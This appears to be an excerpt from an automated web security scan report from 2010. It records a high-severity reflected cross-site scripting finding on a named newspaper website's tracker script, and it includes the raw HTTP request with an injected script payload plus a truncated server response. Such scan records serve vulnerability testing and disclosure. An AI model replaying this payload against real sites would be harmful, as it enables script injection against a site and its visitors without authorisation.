1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.wvgazettemail |
Path: | /mods/jwStats/tracker.php |
GET /mods/jwStats/tracker.php246eb"><script>alert(1)< Host: www.wvgazettemail.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 00:35:10 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Set-Cookie: cookies_enabled=yes; expires=Fri, 21-Jan-2011 05:00:00 GMT; path=/; domain=www.wvgazettemail Content-Length: 178 Connection: close Content-Type: text/html; charset=ISO-8859-1 <head><meta http-equiv="refresh" content="0;url=http:/ <body></body> |